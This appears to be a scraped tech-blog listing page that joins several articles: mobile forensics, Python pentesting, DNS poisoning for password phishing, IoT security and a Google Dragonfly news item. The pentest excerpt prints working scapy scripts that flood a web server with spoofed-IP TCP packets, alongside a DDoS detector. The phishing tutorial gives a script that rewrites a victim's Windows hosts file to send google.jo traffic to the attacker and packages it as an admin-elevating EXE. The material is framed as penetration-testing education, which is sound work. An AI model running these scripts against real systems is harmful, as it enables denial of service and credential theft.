data, renaming files, and modifying the manufacturer's operating system. In this case, the expertise of the suspect should be taken into account. Passcode recovery: If the device is protected with a passcode, the forensic examiner needs to gain access to the device without damaging the data on the device. While there are techniques to bypass the screen lock, they may not work always on all the versions. Communication shielding: Mobile devices communicate over cellular networks, Wi-Fi networks, Bluetooth, and Infrared. As device communication might alter the device data, the possibility of further communication should be eliminated after seizing the device. Lack of availability of tools: There is a wide range of mobile devices. A single tool may not support all the devices or perform all the necessary functions, so a combination of tools needs to be used. Choosing the right tool for a particular phone might be difficult. Malicious programs: The device might contain malicious software or malware, such as a virus or a Trojan. Such malicious programs may attempt to spread over other devices over either a wired interface or a wireless one. Legal issues: Mobile devices might be involved in crimes, which can cross geographical boundaries. In order to tackle these multijurisdictional issues, the forensic examiner should be aware of the nature of the crime and the regional laws. Summary Mobile devices store a wide range of information such as SMS, call logs, browser history, chat messages, location details, and so on. Mobile device forensics includes many approaches and concepts that fall outside of the boundaries of traditional digital forensics. Extreme care should be taken while handling the device right from evidence intake phase to archiving phase. Examiners responsible for mobile devices must understand the different acquisition methods and the complexities of handling the data during analysis. Extracting data from a mobile device is half the battle. The operating system, security features, and type of smartphone will determine the amount of access you have to the data. It is important to follow sound forensic practices and make sure that the evidence is unaltered during the investigation. Resources for Article: Further resources on this subject: Forensics Recovery [article] Mobile Phone Forensics – A First Step into Android Forensics [article] Mobility [article]
Read more
  • 0
  • 0
  • 41523

article-image-pentesting-using-python
Packt
04 Feb 2015
22 min read
Save for later

Pentesting Using Python

Packt
04 Feb 2015
22 min read
 In this article by the author, Mohit, of the book, Python Penetration Testing Essentials, Penetration (pen) tester and hacker are similar terms. The difference is that penetration testers work for an organization to prevent hacking attempts, while hackers hack for any purpose such as fame, selling vulnerability for money, or to exploit vulnerability for personal enmity. Lots of well-trained hackers have got jobs in the information security field by hacking into a system and then informing the victim of the security bug(s) so that they might be fixed. A hacker is called a penetration tester when they work for an organization or company to secure its system. A pentester performs hacking attempts to break the network after getting legal approval from the client and then presents a report of their findings. To become an expert in pentesting, a person should have deep knowledge of the concepts of their technology.  (For more resources related to this topic, see here.) Introducing the scope of pentesting In simple words, penetration testing is to test the information security measures of a company. Information security measures entail a company's network, database, website, public-facing servers, security policies, and everything else specified by the client. At the end of the day, a pentester must present a detailed report of their findings such as weakness, vulnerability in the company's infrastructure, and the risk level of particular vulnerability, and provide solutions if possible. The need for pentesting There are several points that describe the significance of pentesting: Pentesting identifies the threats that might expose the confidentiality of an organization Expert pentesting provides assurance to the organization with a complete and detailed assessment of organizational security Pentesting assesses the network's efficiency by producing huge amount of traffic and scrutinizes the security of devices such as firewalls, routers, and switches Changing or upgrading the existing infrastructure of software, hardware, or network design might lead to vulnerabilities that can be detected by pentesting In today's world, potential threats are increasing significantly; pentesting is a proactive exercise to minimize the chance of being exploited Pentesting ensures whether suitable security policies are being followed or not Consider an example of a well-reputed e-commerce company that makes money from online business. A hacker or group of black hat hackers find a vulnerability in the company's website and hack it. The amount of loss the company will have to bear will be tremendous. Components to be tested An organization should conduct a risk assessment operation before pentesting; this will help identify the main threats such as misconfiguration or vulnerability in: Routers, switches, or gateways Public-facing systems; websites, DMZ, e-mail servers, and remote systems DNS, firewalls, proxy servers, FTP, and web servers Testing should be performed on all hardware and software components of a network security system. Qualities of a good pentester The following points describe the qualities of good pentester. They should: Choose a suitable set of tests and tools that balance cost and benefits Follow suitable procedures with proper planning and documentation Establish the scope for each penetration test, such as objectives, limitations, and the justification of procedures Be ready to show how to exploit the vulnerabilities State the potential risks and findings clearly in the final report and provide methods to mitigate the risk if possible Keep themselves updated at all times because technology is advancing rapidly A pentester tests the network using manual techniques or the relevant tools. There are lots of tools available in the market. Some of them are open source and some of them are highly expensive. With the help of programming, a programmer can make his own tools. By creating your own tools, you can clear your concepts and also perform more R&D. If you are interested in pentesting and want to make your own tools, then the Python programming language is the best, as extensive and freely available pentesting packages are available in Python, in addition to its ease of programming. This simplicity, along with the third-party libraries such as scapy and mechanize, reduces code size. In Python, to make a program, you don't need to define big classes such as Java. It's more productive to write code in Python than in C, and high-level libraries are easily available for virtually any imaginable task. If you know some programming in Python and are interested in pentesting this book is ideal for you. Defining the scope of pentesting Before we get into pentesting, the scope of pentesting should be defined. The following points should be taken into account while defining the scope: You should develop the scope of the project in consultation with the client. For example, if Bob (the client) wants to test the entire network infrastructure of the organization, then pentester Alice would define the scope of pentesting by taking this network into account. Alice will consult Bob on whether any sensitive or restricted areas should be included or not. You should take into account time, people, and money. You should profile the test boundaries on the basis of an agreement signed by the pentester and the client. Changes in business practice might affect the scope. For example, the addition of a subnet, new system component installations, the addition or modification of a web server, and so on, might change the scope of pentesting. The scope of pentesting is defined in two types of tests: A non-destructive test: This test is limited to finding and carrying out the tests without any potential risks. It performs the following actions: Scans and identifies the remote system for potential vulnerabilities Investigates and verifies the findings Maps the vulnerabilities with proper exploits Exploits the remote system with proper care to avoid disruption Provides a proof of concept Does not attempt a Denial-of-Service (DoS) attack A destructive test: This test can produce risks. It performs the following actions: Attempts DoS and buffer overflow attacks, which have the potential to bring down the system Approaches to pentesting There are three types of approaches to pentesting: Black-box pentesting follows non-deterministic approach of testing You will be given just a company name It is like hacking with the knowledge of an outside attacker There is no need of any prior knowledge of the system It is time consuming White-box pentesting follows deterministic approach of testing You will be given complete knowledge of the infrastructure that needs to be tested This is like working as a malicious employee who has ample knowledge of the company's infrastructure You will be provided information on the company's infrastructure, network type, company's policies, do's and don'ts, the IP address, and the IPS/IDS firewall Gray-box pentesting follows hybrid approach of black and white box testing The tester usually has limited information on the target network/system that is provided by the client to lower costs and decrease trial and error on the part of the pentester It performs the security assessment and testing internally Introducing Python scripting Before you start reading this book, you should know the basics of Python programming, such as the basic syntax, variable type, data type tuple, list dictionary, functions, strings, methods, and so on. Two versions, 3.4 and 2.7.8, are available at python.org/downloads/. In this book, all experiments and demonstration have been done in Python 2.7.8 Version. If you use Linux OS such as Kali or BackTrack, then there will be no issue, because many programs, such as wireless sniffing, do not work on the Windows platform. Kali Linux also uses the 2.7 Version. If you love to work on Red Hat or CentOS, then this version is suitable for you. Most of the hackers choose this profession because they don't want to do programming. They want to use tools. However, without programming, a hacker cannot enhance his2 skills. Every time, they have to search the tools over the Internet. Believe me, after seeing its simplicity, you will love this language. Understanding the tests and tools you'll need To conduct scanning and sniffing pentesting, you will need a small network of attached devices. If you don't have a lab, you can make virtual machines in your computer. For wireless traffic analysis, you should have a wireless network. To conduct a web attack, you will need an Apache server running on the Linux platform. It will be a good idea to use CentOS or Red Hat Version 5 or 6 for the web server because this contains the RPM of Apache and PHP. For the Python script, we will use the Wireshark tool, which is open source and can be run on Windows as well as Linux platforms. Learning the common testing platforms with Python You will now perform pentesting; I hope you are well acquainted with networking fundamentals such as IP addresses, classful subnetting, classless subnetting, the meaning of ports, network addresses, and broadcast addresses. A pentester must be perfect in networking fundamentals as well as at least in one operating system; if you are thinking of using Linux, then you are on the right track. In this book, we will execute our programs on Windows as well as Linux. In this book, Windows, CentOS, and Kali Linux will be used. A hacker always loves to work on a Linux system. As it is free and open source, Kali Linux marks the rebirth of BackTrack and is like an arsenal of hacking tools. Kali Linux NetHunter is the first open source Android penetration testing platform for Nexus devices. However, some tools work on both Linux and Windows, but on Windows, you have to install those tools. I expect you to have knowledge of Linux. Now, it's time to work with networking on Python. Implementing a network sniffer by using Python Before learning about the implementation of a network sniffer, let's learn about a particular struct method: struct.pack(fmt, v1, v2, ...): This method returns a string that contains the values v1, v2, and so on, packed according to the given format struct.unpack(fmt, string): This method unpacks the string according to the given format Let's discuss the code: import struct ms= struct.pack('hhl', 1, 2, 3) print (ms) k= struct.unpack('hhl',ms) print k The output for the preceding code is as follows: G:PythonNetworkingnetwork>python str1.py ☺ ☻ ♥ (1, 2, 3) First, import the struct module, and then pack the integers 1, 2, and 3 in the hhl format. The packed values are like machine code. Values are unpacked using the same hhl format; here, h means a short integer and l means a long integer. More details are provided in the subsequent sections. Consider the situation of the client server model; let's illustrate it by means of an example. Run the struct1.py. file. The server-side code is as follows: import socket import struct host = "192.168.0.1" port = 12347 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((host, port)) s.listen(1) conn, addr = s.accept() print "connected by", addr msz= struct.pack('hhl', 1, 2, 3) conn.send(msz) conn.close() The entire code is the same as we have seen previously, with msz= struct.pack('hhl', 1, 2, 3) packing the message and conn.send(msz) sending the message. Run the unstruc.py file. The client-side code is as follows: import socket import struct s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) host = "192.168.0.1" port =12347 s.connect((host,port)) msg= s.recv(1024) print msg print struct.unpack('hhl',msg) s.close() The client-side code accepts the message and unpacks it in the given format. The output for the client-side code is as follows: C:network>python unstruc.py ☺ ☻ ♥ (1, 2, 3) The output for the server-side code is as follows: G:PythonNetworkingprogram>python struct1.py connected by ('192.168.0.11', 1417) Now, you must have a fair idea of how to pack and unpack the data. Format characters We have seen the format in the pack and unpack methods. In the following table, we have C Type and Python type columns. It denotes the conversion between C and Python types. The Standard size column refers to the size of the packed value in bytes. Format C Type Python type Standard size x pad byte no value   c char string of length 1 1 b signed char integer 1 B unsigned char integer 1 ? _Bool bool 1 h short integer 2 H unsigned short integer 2 i int integer 4 I unsigned int integer 4 l long integer 4 L unsigned long integer 4 q long long integer 8 Q unsigned long long integer 8 f float float 4 d double float 8 s char[] string   p char[] string   P void * integer   Let's check what will happen when one value is packed in different formats: >>> import struct >>> struct.pack('b',2) 'x02' >>> struct.pack('B',2) 'x02' >>> struct.pack('h',2) 'x02x00' We packed the number 2 in three different formats. From the preceding table, we know that b and B are 1 byte each, which means that they are the same size. However, h is 2 bytes. Now, let's use the long int, which is 8 bytes: >>> struct.pack('q',2) 'x02x00x00x00x00x00x00x00' If we work on a network, ! should be used in the following format. The ! is used to avoid the confusion of whether network bytes are little-endian or big-endian. For more information on big-endian and little endian, you can refer to the Wikipedia page on Endianness: >>> struct.pack('!q',2) 'x00x00x00x00x00x00x00x02' >>>  You can see the difference when using ! in the format. Before proceeding to sniffing, you should be aware of the following definitions: PF_PACKET: It operates at the device driver layer. The pcap library for Linux uses PF_PACKET sockets. To run this, you must be logged in as a root. If you want to send and receive messages at the most basic level, below the Internet protocol layer, then you need to use PF_PACKET. Raw socket: It does not care about the network layer stack and provides a shortcut to send and receive packets directly to the application. The following socket methods are used for byte-order conversion: socket.ntohl(x): This is the network to host long. It converts a 32-bit positive integer from the network to host the byte order. socket.ntohs(x): This is the network to host short. It converts a 16-bit positive integer from the network to host the byte order. socket.htonl(x): This is the host to network long. It converts a 32-bit positive integer from the host to the network byte order. socket.htons(x): This is the host to network short. It converts a 16-bit positive integer from the host to the network byte order. So, what is the significance of the preceding four methods? Consider a 16-bit number 0000000000000011. When you send this number from one computer to another computer, its order might get changed. The receiving computer might receive it in another form, such as 1100000000000000. These methods convert from your native byte order to the network byte order and back again. Now, let's look at the code to implement a network sniffer, which will work on three layers of the TCP/IP, that is, the physical layer (Ethernet), the Network layer (IP), and the TCP layer (port). Introducing DoS and DDoS In this section, we are going to discuss one of the most deadly attacks, called the Denial-of-Service attack. The aim of this attack is to consume machine or network resources, making it unavailable for the intended users. Generally, attackers use this attack when every other attack fails. This attack can be done at the data link, network, or application layer. Usually, a web server is the target for hackers. In a DoS attack, the attacker sends a huge number of requests to the web server, aiming to consume network bandwidth and machine memory. In a Distributed Denial-of-Service (DDoS) attack, the attacker sends a huge number of requests from different IPs. In order to carry out DDoS, the attacker can use Trojans or IP spoofing. In this section, we will carry out various experiments to complete our reports. Single IP single port In this attack, we send a huge number of packets to the web server using a single IP (which might be spoofed) and from a single source port number. This is a very low-level DoS attack, and this will test the web server's request-handling capacity. The following is the code of sisp.py: from scapy.all import * src = raw_input("Enter the Source IP ") target = raw_input("Enter the Target IP ") srcport = int(raw_input("Enter the Source Port ")) i=1 while True: IP1 = IP(src=src, dst=target) TCP1 = TCP(sport=srcport, dport=80) pkt = IP1 / TCP1 send(pkt,inter= .001) print "packet sent ", i i=i+1 I have used scapy to write this code, and I hope that you are familiar with this. The preceding code asks for three things, the source IP address, the destination IP address, and the source port address. Let's check the output on the attacker's machine:  Single IP with single port I have used a spoofed IP in order to hide my identity. You will have to send a huge number of packets to check the behavior of the web server. During the attack, try to open a website hosted on a web server. Irrespective of whether it works or not, write your findings in the reports. Let's check the output on the server side:  Wireshark output on the server This output shows that our packet was successfully sent to the server. Repeat this program with different sequence numbers. Single IP multiple port Now, in this attack, we use a single IP address but multiple ports. Here, I have written the code of the simp.py program: from scapy.all import *   src = raw_input("Enter the Source IP ") target = raw_input("Enter the Target IP ")   i=1 while True: for srcport in range(1,65535):    IP1 = IP(src=src, dst=target)    TCP1 = TCP(sport=srcport, dport=80)    pkt = IP1 / TCP1    send(pkt,inter= .0001)    print "packet sent ", i    i=i+1 I used the for loop for the ports Let's check the output of the attacker:  Packets from the attacker's machine The preceding screenshot shows that the packet was sent successfully. Now, check the output on the target machine:  Packets appearing in the target machine In the preceding screenshot, the rectangular box shows the port numbers. I will leave it to you to create multiple IP with a single port. Multiple IP multiple port In this section, we will discuss the multiple IP with multiple port addresses. In this attack, we use different IPs to send the packet to the target. Multiple IPs denote spoofed IPs. The following program will send a huge number of packets from spoofed IPs: import random from scapy.all import * target = raw_input("Enter the Target IP ")   i=1 while True: a = str(random.randint(1,254)) b = str(random.randint(1,254)) c = str(random.randint(1,254)) d = str(random.randint(1,254)) dot = "." src = a+dot+b+dot+c+dot+d print src st = random.randint(1,1000) en = random.randint(1000,65535) loop_break = 0 for srcport in range(st,en):    IP1 = IP(src=src, dst=target)    TCP1 = TCP(sport=srcport, dport=80)    pkt = IP1 / TCP1    send(pkt,inter= .0001)    print "packet sent ", i    loop_break = loop_break+1    i=i+1    if loop_break ==50 :      break In the preceding code, we used the a, b, c, and d variables to store four random strings, ranging from 1 to 254. The src variable stores random IP addresses. Here, we have used the loop_break variable to break the for loop after 50 packets. It means 50 packets originate from one IP while the rest of the code is the same as the previous one. Let's check the output of the mimp.py program:  Multiple IP with multiple ports In the preceding screenshot, you can see that after packet 50, the IP addresses get changed. Let's check the output on the target machine:  The target machine's output on Wireshark Use several machines and execute this code. In the preceding screenshot, you can see that the machine replies to the source IP. This type of attack is very difficult to detect because it is very hard to distinguish whether the packets are coming from a valid host or a spoofed host. Detection of DDoS When I was pursuing my Masters of Engineering degree, my friend and I were working on a DDoS attack. This is a very serious attack and difficult to detect, where it is nearly impossible to guess whether the traffic is coming from a fake host or a real host. In a DoS attack, traffic comes from only one source so we can block that particular host. Based on certain assumptions, we can make rules to detect DDoS attacks. If the web server is running only traffic containing port 80, it should be allowed. Now, let's go through a very simple code to detect a DDoS attack. The program's name is DDOS_detect1.py: import socket import struct from datetime import datetime s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, 8) dict = {} file_txt = open("dos.txt",'a') file_txt.writelines("**********") t1= str(datetime.now()) file_txt.writelines(t1) file_txt.writelines("**********") file_txt.writelines("n") print "Detection Start ......." D_val =10 D_val1 = D_val+10 while True:   pkt = s.recvfrom(2048) ipheader = pkt[0][14:34] ip_hdr = struct.unpack("!8sB3s4s4s",ipheader) IP = socket.inet_ntoa(ip_hdr[3]) print "Source IP", IP if dict.has_key(IP):    dict[IP]=dict[IP]+1    print dict[IP]    if(dict[IP]>D_val) and (dict[IP]<D_val1) :        line = "DDOS Detected "      file_txt.writelines(line)      file_txt.writelines(IP)      file_txt.writelines("n")   else: dict[IP]=1 In the previous code, we used a sniffer to get the packet's source IP address. The file_txt = open("dos.txt",'a') statement opens a file in append mode, and this dos.txt file is used as a logfile to detect the DDoS attack. Whenever the program runs, the file_txt.writelines(t1) statement writes the current time. The D_val =10 variable is an assumption just for the demonstration of the program. The assumption is made by viewing the statistics of hits from a particular IP. Consider a case of a tutorial website. The hits from the college and school's IP would be more. If a huge number of requests come in from a new IP, then it might be a case of DoS. If the count of the incoming packets from one IP exceeds the D_val variable, then the IP is considered to be responsible for a DDoS attack. The D_val1 variable will be used later in the code to avoid redundancy. I hope you are familiar with the code before the if dict.has_key(IP): statement. This statement will check whether the key (IP address) exists in the dictionary or not. If the key exists in dict, then the dict[IP]=dict[IP]+1 statement increases the dict[IP] value by 1, which means that dict[IP] contains a count of packets that come from a particular IP. The if(dict[IP]>D_val) and (dict[IP]<D_val1) : statements are the criteria to detect and write results in the dos.txt file; if(dict[IP]>D_val) detects whether the incoming packet's count exceeds the D_val value or not. If it exceeds it, the subsequent statements will write the IP in dos.txt after getting new packets. To avoid redundancy, the (dict[IP]<D_val1) statement has been used. The upcoming statements will write the results in the dos.txt file. Run the program on a server and run mimp.py on the attacker's machine. The following screenshot shows the dos.txt file. Look at that file. It writes a single IP 9 times as we have mentioned D_val1 = D_val+10. You can change the D_val value to set the number of requests made by a particular IP. These depend on the old statistics of the website. I hope the preceding code will be useful for research purposes. Detecting a DDoS attack If you are a security researcher, the preceding program should be useful to you. You can modify the code such that only the packet that contains port 80 will be allowed. Summary In this article, we learned about penetration testing using Python. Also, we have learned about sniffing using Pyython script and client-side validation as well as how to bypass client-side validation. We also learned in which situations client-side validation is a good choice. We have gone through how to use Python to fill a form and send the parameter where the GET method has been used. As a penetration tester, you should know how parameter tampering affects a business. Four types of DoS attacks have been presented in this article. A single IP attack falls into the category of a DoS attack, and a Multiple IP attack falls into the category of a DDoS attack. This section is helpful not only for a pentester but also for researchers. Taking advantage of Python DDoS-detection scripts, you can modify the code and create larger code, which can trigger actions to control or mitigate the DDoS attack on the server. Resources for Article: Further resources on this subject: Veil-Evasion [article] Using the client as a pivot point [article] Penetration Testing and Setup [article]
Read more
  • 0
  • 0
  • 41066
article-image-phish-for-passwords-using-dns-poisoning
Savia Lobo
14 Jun 2018
6 min read
Save for later

Phish for passwords using DNS poisoning [Tutorial]

Savia Lobo
14 Jun 2018
6 min read
Phishing refers to obtaining sensitive information such as passwords, usernames, or even bank details, and so on. Hackers or attackers lure customers to share their personal details by sending them e-mails which appear to come form popular organizatons.  In this tutorial, you will learn how to implement password phishing using DNS poisoning, a form of computer security hacking. In DNS poisoning, a corrupt Domain Name system data is injected into the DNS resolver's cache. This causes the name server to provide an incorrect result record. Such a method can result into traffic being directed onto hacker's computer system. This article is an excerpt taken from 'Python For Offensive PenTest written by Hussam Khrais.  Password phishing – DNS poisoning One of the easiest ways to manipulate the direction of the traffic remotely is to play with DNS records. Each operating system contains a host file in order to statically map hostnames to specific IP addresses. The host file is a plain text file, which can be easily rewritten as long as we have admin privileges. For now, let's have a quick look at the host file in the Windows operating system. In Windows, the file will be located under C:WindowsSystem32driversetc. Let's have a look at the contents of the host file: If you read the description, you will see that each entry should be located on a separate line. Also, there is a sample of the record format, where the IP should be placed first. Then, after at least one space, the name follows. You will also see that each record's IP address begins first and then we get the hostname. Now, let's see the traffic on the packet level: Open Wireshark on our target machine and start the capture. Filter on the attacker IP address: We have an IP address of 10.10.10.100, which is the IP address of our attacker. We can see the traffic before poisoning the DNS records. You need to click on Apply to complete the process. Open https://www.google.jo/?gws_rd=ssl. Notice that once we ping the name from the command line, the operating system behind the scene will do a DNS lookup: We will get the real IP address. Now, notice what happens after DNS poisoning. For this, close all the windows except the one where the Wireshark application is running. Keep in mind that we should run as admin to be able to modify the host file. Now, even though we are running as an admin, when it comes to running an application you should explicitly do a right-click and then run as admin. Navigate to the directory where the hosts file is located. Execute dir and you will get the hosts file. Run type hosts. You can see the original host here. Now, we will enter the command: echo 10.10.10.100 www.google.jo >> hosts 10.10.100, is the IP address of our Kali machine. So, once the target goes to google.jo, it should be redirected to the attacker machine. Once again verify the host by executing type hosts. Now, after doing a DNS modification, it's always a good thing to flush the DNS cache, just to make sure that we will use the updated record. For this, enter the following command: ipconfig /flushdns Now, watch what happens after DNS poisoning. For this, we will open our browser and navigate to https://www.google.jo/?gws_rd=ssl. Notice that on Wireshark the traffic is going to the Kali IP address instead of the real IP address of google.jo. This is because the DNS resolution for google.jo was 10.10.10.100. We will stop the capturing and recover the original hosts file. We will then place that file in the driversetc folder. Now, let's flush the poisoned DNS cache first by running: ipconfig /flushdns Then, open the browser again. We should go to https://www.google.jo/?gws_rd=ssl right now. Now we are good to go! Using Python script Now we'll automate the steps, but this time via a Python script. Open the script and enter the following code: # Python For Offensive PenTest # DNS_Poisoning import subprocess import os os.chdir("C:WindowsSystem32driversetc") # change the script directory to ..etc where the host file is located on windows command = "echo 10.10.10.100 www.google.jo >> hosts" # Append this line to the host file, where it should redirect # traffic going to google.jo to IP of 10.10.10.100 CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) command = "ipconfig /flushdns" # flush the cached dns, to make sure that new sessions will take the new DNS record CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) The first thing we will do is change our current working directory to be the same as the hosts file, and that will be done using the OS library. Then, using subprocesses, we will append a static DNS record, pointing Facebook to 10.10.10.100: the Kali IP address. In the last step, we will flush the DNS record. We can now save the file and export the script into EXE. Remember that we need to make the target execute it as admin. To do that, in the setup file for the py2exe, we will add a new line, as follows: ... windows = [{'script': "DNS.py", 'uac_info': "requireAdministrator"}], ... So, we have added a new option, specifying that when the target executes the EXE file, we will ask to elevate our privilege into admin. To do this, we will require administrator privileges. Let's run the setup file and start a new capture. Now, I will copy our EXE file onto the desktop. Notice here that we got a little shield indicating that this file needs an admin privilege, which will give us the exact result for running as admin. Now, let's run the file. Verify that the file host gets modified. You will see that our line has been added. Now, open a new session and we will see whether we got the redirection. So, let's start a new capture, and we will add on the Firefox. As you will see, the DNS lookup for google.jo is pointing to our IP address, which is 10.10.10.100. We learned how to carry out password phishing using DNS poisoning. If you've enjoyed reading the post, do check out, Python For Offensive PenTest to learn how to hack passwords and perform a privilege escalation on Windows with practical examples. 12 common malware types you should know Getting started with Digital forensics using Autopsy 5 pen testing rules of engagement: What to consider while performing Penetration testing
Read more
  • 0
  • 0
  • 39769

article-image-how-to-stop-hackers-from-messing-with-your-home-network-iot
Guest Contributor
16 Oct 2018
8 min read
Save for later

How to stop hackers from messing with your home network (IoT)

Guest Contributor
16 Oct 2018
8 min read
This week, NCCIC, in collaboration with cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States released a joint ‘Activity Alert Report’. What is alarming in the findings is that a majority of sophisticated exploits on secure networks are being carried out by attackers using freely available tools that find loopholes in security systems. The Internet of Things (IoT) is broader than most people realize. It involves diverse elements that make it possible to transfer data from a point of origin to a destination. Various Internet-ready mechanical devices, computers, and phones are part of your IoT, including servers, networks, cryptocurrency sites, down to the tracking chip in your pet’s collar. Your IoT does not require a person to person interaction. It also doesn’t require a person to device interaction, but it does require device to device connections and interactions. What does all this mean to you? It means hackers have more points of entry into your personal IoT that you ever dreamed of. Here are some of the ways they can infiltrate your personal IoT devices along with some suggestions on how to keep them out. Your home network How many functions are controlled via a home network? From your security system to activating lighting at dusk to changing the setting on the thermostat, many people set up automatic tasks or use remote access to manually adjust so many things. It’s convenient, but it comes with a degree of risk. (Image courtesy of HotForSecurity.BitDefender.com) Hackers who are able to detect and penetrate the wireless home network via your thermostat or the lighting system eventually burrow into other areas, like the hard drive where you keep financial documents. Before you know it, you're a ransomware victim. Too many people think their OS firewall will protect them but by the time a hacker runs into that, they’re already in your computer and can jump out to the wireless devices we’ve been talking about. What can you do about it? Take a cue from your bank. Have you ever tried to access your account from a device that the bank doesn’t recognize? If so, then you know the bank’s system requires you to provide additional means of identification, like a fingerprint scan or answering a security question. That process is called multifactor authentication. Unless the hacker can provide more information, the system blocks the attempt. Make sure your home network is setup to require additional authentication when any device other than your phone, home computer, or tablet is used. Spyware/Malware from websites and email attachments Hacking via email attachments or picking up spyware and malware by visits to unsecured sites are still possible. Since these typically download to your hard drive and run in the background, you may not notice anything at all for a time. All the while, your data is being harvested. You can do something about it. Keep your security software up to date and always load the latest release of your firewall. Never open attachments with unusual extensions even if they appear to be from someone you know. Always use your security software to scan attachments of any kind rather than relying solely on the security measures employed by your email client. Only visit secure sites. If the site address begins with “http” rather than “https” that’s a sign you need to leave it alone. Remember to update your security software at least once a week. Automatic updates are a good thing. Don’t forget to initiate a full system scan at least once a week, even if there are no apparent problems. Do so after making sure you've downloaded and installed the latest security updates. Your pet’s microchip The point of a pet chip is to help you find your pet if it wanders away or is stolen. While not GPS-enabled, it’s possible to scan the chip on an animal who ends up in an animal shelter or clinic and confirm a match. Unfortunately, that function is managed over a network. That means hackers can use it as a gateway. (Image courtesy of HowStuffWorks.com) Network security determines how vulnerable you are in terms of who can access the databases and come up with a match. Your best bet is to find out what security measures the chip manufacturer employs, including how often those measures are updated. If you don’t get straight answers, go with a competitor’s chip. Your child’s toy Have you ever heard of a doll named Cayla? It’s popular in Germany and also happens to be Wi-Fi enabled. That means hackers can gain access to the camera and microphone included in the doll design. Wherever the doll is carried, it’s possible to gather data that can be used for all sorts of activities. That includes capturing information about passwords, PIN codes, and anything else that’s in the range of the camera or the microphone. Internet-enabled toys need to be checked for spyware regularly. More manufacturers provide detectors in the toy designs. You may still need to initiate those scans and keep the software updated. This increases the odds that the toy remains a toy and doesn’t become a spy for some hacker. Infection from trading electronic files It seems pretty harmless to accept a digital music file from a friend. In most cases, there is no harm. Unfortunately, your friend’s digital music collection may already be corrupted. Once you load that corrupted file onto your hard drive, your computer is now part of a botnet network running behind your own home network. (Image courtesy of: AlienVault.com) Whenever you receive a digital file, either via email or by someone stopping by with a jump drive, always use your security software to scan it before downloading it into your system. The software should be able to catch the infection. If you find anything, let your friend know so he or she can take steps to debug the original file. These are only a few examples of how your IoT can be hacked and lead to data theft or corruption. As with any type of internet-based infection, there are new strategies developed daily. How Blockchain might help There’s one major IoT design flaw that allows hackers to easily get into a system and that is the centralized nature of the network’s decision-making. There is a single point of control through which all requests are routed and decisions are made. A hacker has only to penetrate this singular authority to take control of everything because individual devices can’t decide on their own what constitutes a threat. Interestingly enough, the blockchain technology that underpins Bitcoin and many other cryptocurrencies might eventually provide a solution to the extremely hackable state of the IoT as presently configured. While not a perfect solution, the decentralized nature of blockchain has a lot of companies spending plenty on research and development for eventual deployment to a host of uses, including the IoT. The advantage blockchain technology offers to IoT is that it removes the single point of control and allows each device on a network to work in conjunction with the others to detect and thwart hack attempts. Blockchain works through group consensus. This means that in order to take control of a system, a bad actor would have to be able to take control of a majority of the devices all at once, which is an exponentially harder task than breaking through the single point of control model. If a blockchain-powered IoT network detects an intrusion attempt and the group decides it is malicious, it can be quarantined so that no damage occurs to the network. That’s the theory anyway. Since blockchain is an almost brand new technology, there are hurdles to be overcome before it can be deployed on a wide scale as a solution to IoT security problems. Here are a few: Computing power costs - It takes plenty of computer resources to run a blockchain. More than the average household owner is willing to pay right now. That’s why the focus is on industrial IoT uses at present. Legal issues - If you have AI-powered devices making decisions on their own, who will bear ultimate responsibility when things go wrong? Volatility - The development around blockchain is young and unpredictable. Investing in a solution right now might mean having to buy all new equipment in a year. Final Thoughts One thing is certain. We have a huge problem (IoT security) and what might eventually offer a solid solution (blockchain technology). Expect the path to get from here to there to be filled with potholes and dead ends but stay tuned. The potential for a truly revolutionary technology to come into its own is definitely in the mix. About Gary Stevens Gary Stevens is a front-end developer. He's a full-time blockchain geek and a volunteer working for the Ethereum foundation as well as an active Github contributor. Defending your business from the next wave of cyberwar: IoT Threats. 5 DIY IoT projects you can build under $50 IoT botnets Mirai and Gafgyt target vulnerabilities in Apache Struts and SonicWall
Read more
  • 0
  • 0
  • 39337

article-image-google-bypassed-its-own-security-and-privacy-teams-for-project-dragonfly-reveals-intercept
Sugandha Lahoti
30 Nov 2018
5 min read
Save for later

Google bypassed its own security and privacy teams for Project Dragonfly reveals Intercept

Sugandha Lahoti
30 Nov 2018
5 min read
Google’s Project Dragonfly has faced significant criticism and scrutiny from both the public and Google employees. In a major report yesterday, the Intercept revealed how internal conversations around Google’s censored search engine for China shut out Google’s legal, privacy, and security teams. According to named and anonymous senior Googlers who worked on the project and spoke to The Intercept's Ryan Gallagher, Company executives appeared intent on watering down the privacy review. Google bosses also worked to suppress employee criticism of the censored search engine. Project Dragonfly is the secretive search engine that Google is allegedly developing which will comply with the Chinese rules of censorship. It was kept secret from the company at large during the 18 months it was in development until an insider leak led to its existence being revealed in The Intercept. It has been on the receiving end of a constant backlash from various human rights organizations and investigative reporters, since then. Earlier this week, it also faced criticism from human rights organization Amnesty International and was followed by Google employees signing a petition protesting Google’s infamous Project Dragonfly. The secretive way Google operated Dragonfly Majority of the leaks were reported by Yonatan Zunger, a security engineer on the Dragonfly team. He was asked to produce the privacy review for the project in early 2017. However, he faced opposition from Scott Beaumont, Google’s top executive for China and Korea. According to Zunger, Beaumont “wanted the privacy review of Dragonfly]to be pro forma and thought it should defer entirely to his views of what the product ought to be. He did not feel that the security, privacy, and legal teams should be able to question his product decisions, and maintained an openly adversarial relationship with them — quite outside the Google norm.” Beaumont also micromanaged the project and ensured that discussions about Dragonfly and access to documents about it were under his tight control. If some members of the Dragonfly team broke the strict confidentiality rules, then their contracts at Google could be terminated. Privacy report by Zunger In midst of all these conditions, Zunger and his team were still able to produce a privacy report. The report mentioned problematic scenarios that could arise if the search engine was launched in China. The report mentioned that, in China, it would be difficult for Google to legally push back against government requests, refuse to build systems specifically for surveillance, or even notify people of how their data may be used. Zunger’s meetings with the company’s senior leadership on the discussion of the privacy report were repeatedly postponed. Zunger said, “When the meeting did finally take place, in late June 2017, I and my team were not notified, so we missed it and did not attend. This was a deliberate attempt to exclude us.” Dragonfly: Not just an experiment Intercept’s report even demolished Sundar Pichai’s recent public statement on Dragonfly, where he described it as “just an experiment,” adding that it remained unclear whether the company “would or could” eventually launch it in China. Google employees were surprised as they were told to prepare 